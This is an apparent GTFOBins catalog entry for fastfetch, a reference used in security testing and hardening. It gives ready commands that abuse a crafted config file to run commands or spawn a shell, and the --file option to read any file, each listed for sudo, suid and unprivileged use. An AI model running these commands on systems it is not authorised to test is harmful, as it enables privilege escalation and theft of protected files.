Catalog GTFOBins

GTFO · Tool

fastfetch

9 techniques LinuxGTFOBins GPL-3.0

command

ExecutionPrivilege Escalation Linux
echo '{"modules":[{"type":"command","key":"x","text":"exec /path/to/command"}]}' >/path/to/temp-file.jsonc
fastfetch -c /path/to/temp-file.jsonc
Context
sudo
Native
command
MITRE
T1059

command

ExecutionPrivilege Escalation Linux
echo '{"modules":[{"type":"command","key":"x","text":"exec /path/to/command"}]}' >/path/to/temp-file.jsonc
fastfetch -c /path/to/temp-file.jsonc
Context
suid
Native
command
MITRE
T1059

command

Execution Linux
echo '{"modules":[{"type":"command","key":"x","text":"exec /path/to/command"}]}' >/path/to/temp-file.jsonc
fastfetch -c /path/to/temp-file.jsonc
Context
unprivileged
Native
command
MITRE
T1059

file-read

File ReadPrivilege Escalation Linux

The file content is used as the logo while some other information is displayed on its right.

fastfetch --file /path/to/input-file
Context
sudo
Native
file-read
MITRE
T1005

file-read

File ReadPrivilege Escalation Linux

The file content is used as the logo while some other information is displayed on its right.

fastfetch --file /path/to/input-file
Context
suid
Native
file-read
MITRE
T1005

file-read

File Read Linux

The file content is used as the logo while some other information is displayed on its right.

fastfetch --file /path/to/input-file
Context
unprivileged
Native
file-read
MITRE
T1005

shell

ExecutionPrivilege Escalation Linux
echo '{"modules":[{"type":"command","key":"x","text":"exec /bin/sh 1>&0 2>&0"}]}' >/path/to/temp-file.jsonc
fastfetch -c /path/to/temp-file.jsonc
Context
sudo
Native
shell
MITRE
T1059

shell

ExecutionPrivilege Escalation Linux
echo '{"modules":[{"type":"command","key":"x","text":"exec /bin/sh 1>&0 2>&0"}]}' >/path/to/temp-file.jsonc
fastfetch -c /path/to/temp-file.jsonc
Context
suid
Native
shell
MITRE
T1059

shell

Execution Linux
echo '{"modules":[{"type":"command","key":"x","text":"exec /bin/sh 1>&0 2>&0"}]}' >/path/to/temp-file.jsonc
fastfetch -c /path/to/temp-file.jsonc
Context
unprivileged
Native
shell
MITRE
T1059